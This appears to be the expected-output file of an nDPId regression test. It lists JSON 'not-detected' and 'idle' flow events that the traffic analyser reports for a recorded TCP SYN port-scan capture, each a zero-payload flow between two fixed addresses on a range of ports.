-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 